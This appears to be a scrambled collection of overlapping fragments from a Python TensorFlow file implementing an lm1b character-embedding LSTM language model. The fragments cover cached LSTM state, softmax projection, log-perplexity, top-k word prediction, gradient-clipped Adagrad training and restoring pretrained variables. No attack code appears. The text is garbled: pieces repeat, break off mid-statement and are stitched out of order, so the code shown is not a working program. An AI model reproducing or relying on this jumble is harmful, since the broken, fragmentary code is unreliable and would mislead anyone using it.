_attach_log_perplexity_nodes(logits, targets, target_weights,", "+ \"\\d)/lstm_cell/kernel/part_(\\d).*\": r\"\\1/W_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/bias.*\": r\"\\1/B\", r\"^(\" + LSTM_SCOPE_PREFIX +", "\"cell_out_all_layers\": cell_out_all_layers } def attach_predicted_word_nodes(logits, id_to_word_lookup_table, k=5, hparams=None): \"\"\" Helper to pull out", "LSTM with cached / preserved hidden state see: https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html see: https://stackoverflow.com/questions/37969065/tensorflow-best-way-to-save-state-in-rnns :param input:", "dict of inference nodes \"\"\" with tf.variable_scope(CHAR_EMBEDDING_SCOPE): word_embeddings = char_embedding_nodes.attach_char_embedding_nodes(input_seqs, num_shards=NUM_SHARDS, hparams=hparams) word_embeddings", "cell_state, \"logits\": logits, \"softmax\": softmax, \"cell_state_all_layers\": cell_state_all_layers, \"cell_out_all_layers\": cell_out_all_layers } 
def attach_predicted_word_nodes(logits, id_to_word_lookup_table,", "pre-trained model to the current graph :param sess: :param run_config: :return: \"\"\" def", "optimizer = tf.train.AdagradOptimizer(hparams.learning_rate) global_step = tf.Variable(0, name='global_step', trainable=False) train_op = optimizer.apply_gradients(zip(all_gradients, trainable_vars), global_step=global_step)", "state \"\"\" # LSTM with cached / preserved hidden state # https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html cell", "words :param logits: :param id_to_word_lookup_table: :param k: :param hparams: :return: \"\"\" top_k =", "matching_variables: var_map[re.sub(r_match, r_replace, v.name)] = v # Map softmax embedding vars var_map =", "\"\"\" # LSTM with cached / preserved hidden state # https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html cell =", "trainable=False) train_op = optimizer.apply_gradients(zip(all_gradients, trainable_vars), global_step=global_step) return {\"train_op\": train_op, \"global_step\": global_step} def restore_original_lm1b(sess,", "{} # Map char embedding vars var_map = merge(var_map, dict(map(lambda x: (x.op.name, x),", "# LSTM with cached / preserved hidden state # https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html cell = tf.contrib.rnn.LSTMCell(num_units=NUM_SHARDS", "word_embeddings, \"lstm_outputs\": lstm_outputs, \"lstm_state\": cell_state, \"logits\": logits, \"softmax\": softmax, \"cell_state_all_layers\": cell_state_all_layers, \"cell_out_all_layers\": cell_out_all_layers", "return {\"train_op\": train_op, \"global_step\": global_step} def restore_original_lm1b(sess, run_config): \"\"\" Var mapping shenanigans to", "merge from lm1b.utils.model import sharded_linear, create_sharded_weights NUM_SHARDS = 8 def _attach_cached_lstm_nodes(input, hparams=None): \"\"\"", "target_weights_list = tf.to_float(tf.reshape(target_weights, [-1])) # hrmm word_count = 
tf.add(tf.reduce_sum(target_weights_list), 0.0000999999974738) cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits,", "return logits, softmax def _attach_log_perplexity_nodes(logits, targets, target_weights, hparams=None): \"\"\" :param logits: :param targets:", "out_0 = tf.identity(out_0) return out_0, state_0 def _attach_projection_nodes(input, hparams=None): \"\"\" Project LSTM outputs", "= tf.trainable_variables() tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope=\"\") tf.global_variables() all_gradients = tf.gradients(loss, trainable_vars) lstm_gradients = filter(lambda x:", "target_weights, hparams=None): \"\"\" :param logits: :param targets: :param target_weights: :param hparams: :return: \"\"\"", "softmax_vars): var_map = {} # Map char embedding vars var_map = merge(var_map, dict(map(lambda", "loss: :param hparams: :return: \"\"\" trainable_vars = tf.trainable_variables() tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope=\"\") tf.global_variables() all_gradients =", "def attach_inference_nodes(input_seqs, hparams=None): \"\"\" Predict next word for each sequence / timestep in", "tensorflow as tf import re import os import lm1b.model.char_embedding_nodes as char_embedding_nodes from lm1b.utils.util", ":param hparams: :return: \"\"\" top_k = tf.nn.top_k(logits, k) top_word_ids = top_k.indices word_predictions =", "out_0, state_0 = cell(input, tf.nn.rnn_cell.LSTMStateTuple(state_c, state_h)) ass_c = tf.assign(state_c, state_0[0]) ass_h = tf.assign(state_h,", "= tf.to_float(tf.reshape(target_weights, [-1])) # hrmm word_count = tf.add(tf.reduce_sum(target_weights_list), 0.0000999999974738) cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=target_list)", "LSTM_SCOPE_PREFIX = \"lstm/lstm_\" SOFTMAX_SCOPE = \"softmax\" def attach_inference_nodes(input_seqs, hparams=None): \"\"\" Predict next word", "k]) return {\"predicted_words\": word_predictions, \"top_k\": top_k} def attach_training_nodes(loss, 
hparams=None): \"\"\" Attach nodes for", "\"\"\" Attach nodes for training. Work in progress... :param loss: :param hparams: :return:", "cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=target_list) cross_entropy = tf.multiply(cross_entropy, tf.to_float(target_weights)) return {\"log_perplexity\": tf.reduce_sum(cross_entropy) / word_count,", "+ \"_diag\", } for r_match, r_replace in var_map_regexes.items(): matching_variables = filter(lambda x: re.match(r_match,", "cross_entropy} CHAR_EMBEDDING_SCOPE = \"char_embedding\" LSTM_SCOPE_PREFIX = \"lstm/lstm_\" SOFTMAX_SCOPE = \"softmax\" def attach_inference_nodes(input_seqs, hparams=None):", "shape=(-1, hparams.word_embedding_size)) with tf.variable_scope(SOFTMAX_SCOPE): logits, softmax = _attach_projection_nodes(lstm_outputs, hparams=hparams) return { \"word_embeddings\": word_embeddings,", "LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/projection/kernel/part_(\\d).*\": r\"\\1/W_P_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/kernel/part_(\\d).*\": r\"\\1/W_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX", "top_k.indices word_predictions = tf.reshape(id_to_word_lookup_table.lookup(tf.to_int64(tf.reshape(top_word_ids, [-1]))), [-1, k]) return {\"predicted_words\": word_predictions, \"top_k\": top_k} def", "the pre-trained model to the current graph :param sess: :param run_config: :return: \"\"\"", ":param input: tensor of word embeddings :param hparams: :return: lstm output and state", "with cached / preserved hidden state # https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html cell = tf.contrib.rnn.LSTMCell(num_units=NUM_SHARDS * hparams.word_embedding_size,", "import re import os import lm1b.model.char_embedding_nodes as char_embedding_nodes from lm1b.utils.util import merge from", "top_k = tf.nn.top_k(logits, k) top_word_ids = top_k.indices word_predictions = tf.reshape(id_to_word_lookup_table.lookup(tf.to_int64(tf.reshape(top_word_ids, [-1]))), [-1, k])", "} def 
attach_predicted_word_nodes(logits, id_to_word_lookup_table, k=5, hparams=None): \"\"\" Helper to pull out the most", "LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/bias.*\": r\"\\1/B\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/w_([fio])_diag.*\": lambda match: match.group(1) +", "trainable=False) out_0, state_0 = cell(input, tf.nn.rnn_cell.LSTMStateTuple(state_c, state_h)) ass_c = tf.assign(state_c, state_0[0]) ass_h =", "see: https://stackoverflow.com/questions/37969065/tensorflow-best-way-to-save-state-in-rnns :param input: tensor of word embeddings :param hparams: :return: lstm output", "attach_predicted_word_nodes(logits, id_to_word_lookup_table, k=5, hparams=None): \"\"\" Helper to pull out the most likely words", "re.match(r_match, x.name), lstm_vars) for v in matching_variables: var_map[re.sub(r_match, r_replace, v.name)] = v #", "tf.control_dependencies([ass_c, ass_h]): out_0 = tf.identity(out_0) return out_0, state_0 def _attach_projection_nodes(input, hparams=None): \"\"\" Project", "{ \"word_embeddings\": word_embeddings, \"lstm_outputs\": lstm_outputs, \"lstm_state\": cell_state, \"logits\": logits, \"softmax\": softmax, \"cell_state_all_layers\": cell_state_all_layers,", "tf.contrib.rnn.LSTMCell(num_units=NUM_SHARDS * hparams.word_embedding_size, num_proj=hparams.word_embedding_size, num_unit_shards=NUM_SHARDS, num_proj_shards=NUM_SHARDS, forget_bias=1.0, use_peepholes=True) state_c = tf.get_variable(name=\"state_c\", shape=(hparams.batch_size *", ":return: \"\"\" def create_lm1b_restoration_var_map(char_embedding_vars, lstm_vars, softmax_vars): var_map = {} # Map char embedding", "r_match, r_replace in var_map_regexes.items(): matching_variables = filter(lambda x: re.match(r_match, x.name), lstm_vars) for v", "cell(input, tf.nn.rnn_cell.LSTMStateTuple(state_c, state_h)) ass_c = tf.assign(state_c, state_0[0]) ass_h = tf.assign(state_h, state_0[1]) with tf.control_dependencies([ass_c,", "trainable_vars), global_step=global_step) return {\"train_op\": 
train_op, \"global_step\": global_step} def restore_original_lm1b(sess, run_config): \"\"\" Var mapping", ":param id_to_word_lookup_table: :param k: :param hparams: :return: \"\"\" top_k = tf.nn.top_k(logits, k) top_word_ids", "current graph :param sess: :param run_config: :return: \"\"\" def create_lm1b_restoration_var_map(char_embedding_vars, lstm_vars, softmax_vars): var_map", "8192), initializer=tf.zeros_initializer, trainable=False) state_h = tf.get_variable(name=\"state_h\", shape=(hparams.batch_size * hparams.sequence_length, 1024), initializer=tf.zeros_initializer, trainable=False) out_0,", "support to trainer # todo: reset lstm hidden state for inference # todo:", "word predictions :param input: lstm outputs :param hparams: :return: tensor shaped [?,vocab_size] \"\"\"", "softmax_b, data_format=\"NHWC\") softmax = tf.nn.softmax(logits) return logits, softmax def _attach_log_perplexity_nodes(logits, targets, target_weights, hparams=None):", "\"\"\" target_list = tf.reshape(targets, [-1]) target_weights_list = tf.to_float(tf.reshape(target_weights, [-1])) # hrmm word_count =", "var_map[re.sub(r_match, r_replace, v.name)] = v # Map softmax embedding vars var_map = merge(var_map,", "with tf.variable_scope(SOFTMAX_SCOPE): logits, softmax = _attach_projection_nodes(lstm_outputs, hparams=hparams) return { \"word_embeddings\": word_embeddings, \"lstm_outputs\": lstm_outputs,", "os import lm1b.model.char_embedding_nodes as char_embedding_nodes from lm1b.utils.util import merge from lm1b.utils.model import sharded_linear,", ":param hparams: :return: dict of inference nodes \"\"\" with tf.variable_scope(CHAR_EMBEDDING_SCOPE): word_embeddings = char_embedding_nodes.attach_char_embedding_nodes(input_seqs,", "hidden state see: https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html see: https://stackoverflow.com/questions/37969065/tensorflow-best-way-to-save-state-in-rnns :param input: tensor of word embeddings :param", "softmax_w = 
create_sharded_weights((hparams.vocab_size / NUM_SHARDS, hparams.word_embedding_size), num_shards=NUM_SHARDS, concat_dim=1) softmax_w = tf.reshape(softmax_w, shape=(-1, hparams.word_embedding_size))", "to sparse vectors / word predictions :param input: lstm outputs :param hparams: :return:", "r_replace, v.name)] = v # Map softmax embedding vars var_map = merge(var_map, dict(map(lambda", "hidden state for inference # todo: cleanup batch_sizing inconsistencies import tensorflow as tf", "\"\\d)/lstm_cell/w_([fio])_diag.*\": lambda match: match.group(1) + \"/W_\" + match.group( 2).upper() + \"_diag\", } for", "softmax embedding vars var_map = merge(var_map, dict(map(lambda x: (x.op.name, x), softmax_vars))) return var_map", "attach_training_nodes(loss, hparams=None): \"\"\" Attach nodes for training. Work in progress... :param loss: :param", "restore_original_lm1b(sess, run_config): \"\"\" Var mapping shenanigans to restore the pre-trained model to the", "hparams: :return: \"\"\" target_list = tf.reshape(targets, [-1]) target_weights_list = tf.to_float(tf.reshape(target_weights, [-1])) # hrmm", "hparams=hparams) word_embeddings = tf.reshape(word_embeddings, (-1, hparams.word_embedding_size)) cell_out = word_embeddings cell_state_all_layers = [] cell_out_all_layers", "Var mapping shenanigans to restore the pre-trained model to the current graph :param", "= filter(lambda x: -1 < x.op.name.find(\"lstm\"), all_gradients) non_lstm_gradients = set(all_gradients).difference(lstm_gradients) lstm_gradients, global_norm =", "\"softmax\" def attach_inference_nodes(input_seqs, hparams=None): \"\"\" Predict next word for each sequence / timestep", "tf.Variable(0, name='global_step', trainable=False) train_op = optimizer.apply_gradients(zip(all_gradients, trainable_vars), global_step=global_step) return {\"train_op\": train_op, \"global_step\": global_step}", ":return: \"\"\" trainable_vars = tf.trainable_variables() tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope=\"\") 
tf.global_variables() all_gradients = tf.gradients(loss, trainable_vars) lstm_gradients", "hparams.word_embedding_size)) cell_out = word_embeddings cell_state_all_layers = [] cell_out_all_layers = [] for layer_num in", "import sharded_linear, create_sharded_weights NUM_SHARDS = 8 def _attach_cached_lstm_nodes(input, hparams=None): \"\"\" LSTM with cached", "= optimizer.apply_gradients(zip(all_gradients, trainable_vars), global_step=global_step) return {\"train_op\": train_op, \"global_step\": global_step} def restore_original_lm1b(sess, run_config): \"\"\"", "most likely words :param logits: :param id_to_word_lookup_table: :param k: :param hparams: :return: \"\"\"", "= tf.gradients(loss, trainable_vars) lstm_gradients = filter(lambda x: -1 < x.op.name.find(\"lstm\"), all_gradients) non_lstm_gradients =", "# Map lstm embedding vars var_map_regexes = {r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/projection/kernel/part_(\\d).*\": r\"\\1/W_P_\\2\",", "create_lm1b_restoration_var_map(char_embedding_vars, lstm_vars, softmax_vars): var_map = {} # Map char embedding vars var_map =", "= [] for layer_num in range(0, 2): with tf.variable_scope(LSTM_SCOPE_PREFIX + str(layer_num)): cell_out, cell_state", "cell_state_all_layers, \"cell_out_all_layers\": cell_out_all_layers } def attach_predicted_word_nodes(logits, id_to_word_lookup_table, k=5, hparams=None): \"\"\" Helper to pull", "= tf.assign(state_h, state_0[1]) with tf.control_dependencies([ass_c, ass_h]): out_0 = tf.identity(out_0) return out_0, state_0 def", "r\"\\1/W_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/bias.*\": r\"\\1/B\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/w_([fio])_diag.*\": lambda", "k: :param hparams: :return: \"\"\" top_k = tf.nn.top_k(logits, k) top_word_ids = top_k.indices word_predictions", "outputs :param hparams: :return: tensor shaped [?,vocab_size] \"\"\" softmax_w = create_sharded_weights((hparams.vocab_size / NUM_SHARDS,", "\"\"\" LSTM with cached / preserved hidden state 
see: https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html see: https://stackoverflow.com/questions/37969065/tensorflow-best-way-to-save-state-in-rnns :param", "def _attach_cached_lstm_nodes(input, hparams=None): \"\"\" LSTM with cached / preserved hidden state see: https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html", "= tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=target_list) cross_entropy = tf.multiply(cross_entropy, tf.to_float(target_weights)) return {\"log_perplexity\": tf.reduce_sum(cross_entropy) / word_count, \"cross_entropy\":", "tf.to_float(tf.reshape(target_weights, [-1])) # hrmm word_count = tf.add(tf.reduce_sum(target_weights_list), 0.0000999999974738) cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=target_list) cross_entropy", ":param logits: :param id_to_word_lookup_table: :param k: :param hparams: :return: \"\"\" top_k = tf.nn.top_k(logits,", ":param logits: :param targets: :param target_weights: :param hparams: :return: \"\"\" target_list = tf.reshape(targets,", "scope=\"\") tf.global_variables() all_gradients = tf.gradients(loss, trainable_vars) lstm_gradients = filter(lambda x: -1 < x.op.name.find(\"lstm\"),", "top_k} def attach_training_nodes(loss, hparams=None): \"\"\" Attach nodes for training. Work in progress... 
:param", "/ preserved hidden state # https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html cell = tf.contrib.rnn.LSTMCell(num_units=NUM_SHARDS * hparams.word_embedding_size, num_proj=hparams.word_embedding_size, num_unit_shards=NUM_SHARDS,", "Project LSTM outputs to sparse vectors / word predictions :param input: lstm outputs", "labels=target_list) cross_entropy = tf.multiply(cross_entropy, tf.to_float(target_weights)) return {\"log_perplexity\": tf.reduce_sum(cross_entropy) / word_count, \"cross_entropy\": cross_entropy} CHAR_EMBEDDING_SCOPE", "= create_sharded_weights((hparams.vocab_size / NUM_SHARDS, hparams.word_embedding_size), num_shards=NUM_SHARDS, concat_dim=1) softmax_w = tf.reshape(softmax_w, shape=(-1, hparams.word_embedding_size)) softmax_b", "softmax_w, transpose_b=True), softmax_b, data_format=\"NHWC\") softmax = tf.nn.softmax(logits) return logits, softmax def _attach_log_perplexity_nodes(logits, targets,", "hparams.word_embedding_size)) softmax_b = tf.get_variable('b', shape=(hparams.vocab_size)) logits = tf.nn.bias_add(tf.matmul(input, softmax_w, transpose_b=True), softmax_b, data_format=\"NHWC\") softmax", "softmax, \"cell_state_all_layers\": cell_state_all_layers, \"cell_out_all_layers\": cell_out_all_layers } def attach_predicted_word_nodes(logits, id_to_word_lookup_table, k=5, hparams=None): \"\"\" Helper", "hparams.word_embedding_size, num_proj=hparams.word_embedding_size, num_unit_shards=NUM_SHARDS, num_proj_shards=NUM_SHARDS, forget_bias=1.0, use_peepholes=True) state_c = tf.get_variable(name=\"state_c\", shape=(hparams.batch_size * hparams.sequence_length, 8192),", "vectors / word predictions :param input: lstm outputs :param hparams: :return: tensor shaped", "\"\"\" with tf.variable_scope(CHAR_EMBEDDING_SCOPE): word_embeddings = char_embedding_nodes.attach_char_embedding_nodes(input_seqs, num_shards=NUM_SHARDS, hparams=hparams) word_embeddings = tf.reshape(word_embeddings, (-1, hparams.word_embedding_size))", "reset 
lstm hidden state for inference # todo: cleanup batch_sizing inconsistencies import tensorflow", "\"char_embedding\" LSTM_SCOPE_PREFIX = \"lstm/lstm_\" SOFTMAX_SCOPE = \"softmax\" def attach_inference_nodes(input_seqs, hparams=None): \"\"\" Predict next", "(x.op.name, x), softmax_vars))) return var_map var_map = create_lm1b_restoration_var_map( char_embedding_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=CHAR_EMBEDDING_SCOPE), lstm_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=LSTM_SCOPE_PREFIX), softmax_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES,", "hparams=None): \"\"\" Attach nodes for training. Work in progress... :param loss: :param hparams:", "lstm_gradients, global_norm = tf.clip_by_global_norm(lstm_gradients, hparams.lstm_clip_grad_norm) all_gradients = non_lstm_gradients.union(lstm_gradients) optimizer = tf.train.AdagradOptimizer(hparams.learning_rate) global_step =", "as tf import re import os import lm1b.model.char_embedding_nodes as char_embedding_nodes from lm1b.utils.util import", "# Map char embedding vars var_map = merge(var_map, dict(map(lambda x: (x.op.name, x), char_embedding_vars)))", "/ word predictions :param input: lstm outputs :param hparams: :return: tensor shaped [?,vocab_size]", "shape=(hparams.batch_size * hparams.sequence_length, 8192), initializer=tf.zeros_initializer, trainable=False) state_h = tf.get_variable(name=\"state_h\", shape=(hparams.batch_size * hparams.sequence_length, 1024),", "in var_map_regexes.items(): matching_variables = filter(lambda x: re.match(r_match, x.name), lstm_vars) for v in matching_variables:", "/ NUM_SHARDS, hparams.word_embedding_size), num_shards=NUM_SHARDS, concat_dim=1) softmax_w = tf.reshape(softmax_w, shape=(-1, hparams.word_embedding_size)) softmax_b = tf.get_variable('b',", "tf.reduce_sum(cross_entropy) / word_count, \"cross_entropy\": cross_entropy} CHAR_EMBEDDING_SCOPE = \"char_embedding\" LSTM_SCOPE_PREFIX = \"lstm/lstm_\" SOFTMAX_SCOPE =", ":param 
target_weights: :param hparams: :return: \"\"\" target_list = tf.reshape(targets, [-1]) target_weights_list = tf.to_float(tf.reshape(target_weights,", "for training. Work in progress... :param loss: :param hparams: :return: \"\"\" trainable_vars =", "global_step=global_step) return {\"train_op\": train_op, \"global_step\": global_step} def restore_original_lm1b(sess, run_config): \"\"\" Var mapping shenanigans", "\"\"\" Project LSTM outputs to sparse vectors / word predictions :param input: lstm", ":return: lstm output and state \"\"\" # LSTM with cached / preserved hidden", "tf.get_variable(name=\"state_h\", shape=(hparams.batch_size * hparams.sequence_length, 1024), initializer=tf.zeros_initializer, trainable=False) out_0, state_0 = cell(input, tf.nn.rnn_cell.LSTMStateTuple(state_c, state_h))", "state_h = tf.get_variable(name=\"state_h\", shape=(hparams.batch_size * hparams.sequence_length, 1024), initializer=tf.zeros_initializer, trainable=False) out_0, state_0 = cell(input,", "likely words :param logits: :param id_to_word_lookup_table: :param k: :param hparams: :return: \"\"\" top_k", "x: (x.op.name, x), char_embedding_vars))) # Map lstm embedding vars var_map_regexes = {r\"^(\" +", "cross_entropy = tf.multiply(cross_entropy, tf.to_float(target_weights)) return {\"log_perplexity\": tf.reduce_sum(cross_entropy) / word_count, \"cross_entropy\": cross_entropy} CHAR_EMBEDDING_SCOPE =", "-1 < x.op.name.find(\"lstm\"), all_gradients) non_lstm_gradients = set(all_gradients).difference(lstm_gradients) lstm_gradients, global_norm = tf.clip_by_global_norm(lstm_gradients, hparams.lstm_clip_grad_norm) all_gradients", "tf.variable_scope(SOFTMAX_SCOPE): logits, softmax = _attach_projection_nodes(lstm_outputs, hparams=hparams) return { \"word_embeddings\": word_embeddings, \"lstm_outputs\": lstm_outputs, \"lstm_state\":", "matching_variables = filter(lambda x: re.match(r_match, x.name), lstm_vars) for v in matching_variables: var_map[re.sub(r_match, r_replace,", "import 
lm1b.model.char_embedding_nodes as char_embedding_nodes from lm1b.utils.util import merge from lm1b.utils.model import sharded_linear, create_sharded_weights", "x: (x.op.name, x), softmax_vars))) return var_map var_map = create_lm1b_restoration_var_map( char_embedding_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=CHAR_EMBEDDING_SCOPE), lstm_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=LSTM_SCOPE_PREFIX),", "= tf.get_variable('b', shape=(hparams.vocab_size)) logits = tf.nn.bias_add(tf.matmul(input, softmax_w, transpose_b=True), softmax_b, data_format=\"NHWC\") softmax = tf.nn.softmax(logits)", "word_embeddings = char_embedding_nodes.attach_char_embedding_nodes(input_seqs, num_shards=NUM_SHARDS, hparams=hparams) word_embeddings = tf.reshape(word_embeddings, (-1, hparams.word_embedding_size)) cell_out = word_embeddings", "tf import re import os import lm1b.model.char_embedding_nodes as char_embedding_nodes from lm1b.utils.util import merge", "# Map softmax embedding vars var_map = merge(var_map, dict(map(lambda x: (x.op.name, x), softmax_vars)))", "[] for layer_num in range(0, 2): with tf.variable_scope(LSTM_SCOPE_PREFIX + str(layer_num)): cell_out, cell_state =", "import os import lm1b.model.char_embedding_nodes as char_embedding_nodes from lm1b.utils.util import merge from lm1b.utils.model import", ":param loss: :param hparams: :return: \"\"\" trainable_vars = tf.trainable_variables() tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope=\"\") tf.global_variables() all_gradients", "preserved hidden state see: https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html see: https://stackoverflow.com/questions/37969065/tensorflow-best-way-to-save-state-in-rnns :param input: tensor of word embeddings", "_attach_projection_nodes(lstm_outputs, hparams=hparams) return { \"word_embeddings\": word_embeddings, \"lstm_outputs\": lstm_outputs, \"lstm_state\": cell_state, \"logits\": logits, \"softmax\":", "logits, \"softmax\": 
softmax, \"cell_state_all_layers\": cell_state_all_layers, \"cell_out_all_layers\": cell_out_all_layers } def attach_predicted_word_nodes(logits, id_to_word_lookup_table, k=5, hparams=None):", "merge(var_map, dict(map(lambda x: (x.op.name, x), softmax_vars))) return var_map var_map = create_lm1b_restoration_var_map( char_embedding_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=CHAR_EMBEDDING_SCOPE),", "softmax = tf.nn.softmax(logits) return logits, softmax def _attach_log_perplexity_nodes(logits, targets, target_weights, hparams=None): \"\"\" :param", "initializer=tf.zeros_initializer, trainable=False) state_h = tf.get_variable(name=\"state_h\", shape=(hparams.batch_size * hparams.sequence_length, 1024), initializer=tf.zeros_initializer, trainable=False) out_0, state_0", "of character encoded words :param hparams: :return: dict of inference nodes \"\"\" with", "logits, softmax = _attach_projection_nodes(lstm_outputs, hparams=hparams) return { \"word_embeddings\": word_embeddings, \"lstm_outputs\": lstm_outputs, \"lstm_state\": cell_state,", "create_sharded_weights((hparams.vocab_size / NUM_SHARDS, hparams.word_embedding_size), num_shards=NUM_SHARDS, concat_dim=1) softmax_w = tf.reshape(softmax_w, shape=(-1, hparams.word_embedding_size)) softmax_b =", "tf.reshape(softmax_w, shape=(-1, hparams.word_embedding_size)) softmax_b = tf.get_variable('b', shape=(hparams.vocab_size)) logits = tf.nn.bias_add(tf.matmul(input, softmax_w, transpose_b=True), softmax_b,", "k) top_word_ids = top_k.indices word_predictions = tf.reshape(id_to_word_lookup_table.lookup(tf.to_int64(tf.reshape(top_word_ids, [-1]))), [-1, k]) return {\"predicted_words\": word_predictions,", "softmax = _attach_projection_nodes(lstm_outputs, hparams=hparams) return { \"word_embeddings\": word_embeddings, \"lstm_outputs\": lstm_outputs, \"lstm_state\": cell_state, \"logits\":", "state # https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html cell = 
tf.contrib.rnn.LSTMCell(num_units=NUM_SHARDS * hparams.word_embedding_size, num_proj=hparams.word_embedding_size, num_unit_shards=NUM_SHARDS, num_proj_shards=NUM_SHARDS, forget_bias=1.0, use_peepholes=True)", ":param input: lstm outputs :param hparams: :return: tensor shaped [?,vocab_size] \"\"\" softmax_w =", "ass_c = tf.assign(state_c, state_0[0]) ass_h = tf.assign(state_h, state_0[1]) with tf.control_dependencies([ass_c, ass_h]): out_0 =", "num_unit_shards=NUM_SHARDS, num_proj_shards=NUM_SHARDS, forget_bias=1.0, use_peepholes=True) state_c = tf.get_variable(name=\"state_c\", shape=(hparams.batch_size * hparams.sequence_length, 8192), initializer=tf.zeros_initializer, trainable=False)", "x: -1 < x.op.name.find(\"lstm\"), all_gradients) non_lstm_gradients = set(all_gradients).difference(lstm_gradients) lstm_gradients, global_norm = tf.clip_by_global_norm(lstm_gradients, hparams.lstm_clip_grad_norm)", "from lm1b.utils.util import merge from lm1b.utils.model import sharded_linear, create_sharded_weights NUM_SHARDS = 8 def", "(-1, hparams.word_embedding_size)) cell_out = word_embeddings cell_state_all_layers = [] cell_out_all_layers = [] for layer_num", "Map softmax embedding vars var_map = merge(var_map, dict(map(lambda x: (x.op.name, x), softmax_vars))) return", "outputs to sparse vectors / word predictions :param input: lstm outputs :param hparams:", "attach_inference_nodes(input_seqs, hparams=None): \"\"\" Predict next word for each sequence / timestep in input_seqs", "# todo: add GPU support to trainer # todo: reset lstm hidden state", "cell_state_all_layers.append(cell_state) cell_out_all_layers.append(cell_out) lstm_outputs = tf.reshape(cell_out, shape=(-1, hparams.word_embedding_size)) with tf.variable_scope(SOFTMAX_SCOPE): logits, softmax = _attach_projection_nodes(lstm_outputs,", "run_config): \"\"\" Var mapping shenanigans to restore the pre-trained model to the current", "= tf.assign(state_c, state_0[0]) ass_h = tf.assign(state_h, state_0[1]) with 
tf.control_dependencies([ass_c, ass_h]): out_0 = tf.identity(out_0)", "CHAR_EMBEDDING_SCOPE = \"char_embedding\" LSTM_SCOPE_PREFIX = \"lstm/lstm_\" SOFTMAX_SCOPE = \"softmax\" def attach_inference_nodes(input_seqs, hparams=None): \"\"\"", "+ \"\\d)/lstm_cell/w_([fio])_diag.*\": lambda match: match.group(1) + \"/W_\" + match.group( 2).upper() + \"_diag\", }", "filter(lambda x: re.match(r_match, x.name), lstm_vars) for v in matching_variables: var_map[re.sub(r_match, r_replace, v.name)] =", "tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope=\"\") tf.global_variables() all_gradients = tf.gradients(loss, trainable_vars) lstm_gradients = filter(lambda x: -1 <", "todo: cleanup batch_sizing inconsistencies import tensorflow as tf import re import os import", "LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/w_([fio])_diag.*\": lambda match: match.group(1) + \"/W_\" + match.group( 2).upper() + \"_diag\",", "= tf.reshape(word_embeddings, (-1, hparams.word_embedding_size)) cell_out = word_embeddings cell_state_all_layers = [] cell_out_all_layers = []", "def attach_training_nodes(loss, hparams=None): \"\"\" Attach nodes for training. Work in progress... 
:param loss:", "model to the current graph :param sess: :param run_config: :return: \"\"\" def create_lm1b_restoration_var_map(char_embedding_vars,", "LSTM outputs to sparse vectors / word predictions :param input: lstm outputs :param", ":return: \"\"\" top_k = tf.nn.top_k(logits, k) top_word_ids = top_k.indices word_predictions = tf.reshape(id_to_word_lookup_table.lookup(tf.to_int64(tf.reshape(top_word_ids, [-1]))),", "NUM_SHARDS, hparams.word_embedding_size), num_shards=NUM_SHARDS, concat_dim=1) softmax_w = tf.reshape(softmax_w, shape=(-1, hparams.word_embedding_size)) softmax_b = tf.get_variable('b', shape=(hparams.vocab_size))", "embedding vars var_map = merge(var_map, dict(map(lambda x: (x.op.name, x), softmax_vars))) return var_map var_map", "cell = tf.contrib.rnn.LSTMCell(num_units=NUM_SHARDS * hparams.word_embedding_size, num_proj=hparams.word_embedding_size, num_unit_shards=NUM_SHARDS, num_proj_shards=NUM_SHARDS, forget_bias=1.0, use_peepholes=True) state_c = tf.get_variable(name=\"state_c\",", "ass_h = tf.assign(state_h, state_0[1]) with tf.control_dependencies([ass_c, ass_h]): out_0 = tf.identity(out_0) return out_0, state_0", "hparams: :return: lstm output and state \"\"\" # LSTM with cached / preserved", "def attach_predicted_word_nodes(logits, id_to_word_lookup_table, k=5, hparams=None): \"\"\" Helper to pull out the most likely", "cell_out_all_layers = [] for layer_num in range(0, 2): with tf.variable_scope(LSTM_SCOPE_PREFIX + str(layer_num)): cell_out,", "\"\"\" trainable_vars = tf.trainable_variables() tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope=\"\") tf.global_variables() all_gradients = tf.gradients(loss, trainable_vars) lstm_gradients =", "= \"char_embedding\" LSTM_SCOPE_PREFIX = 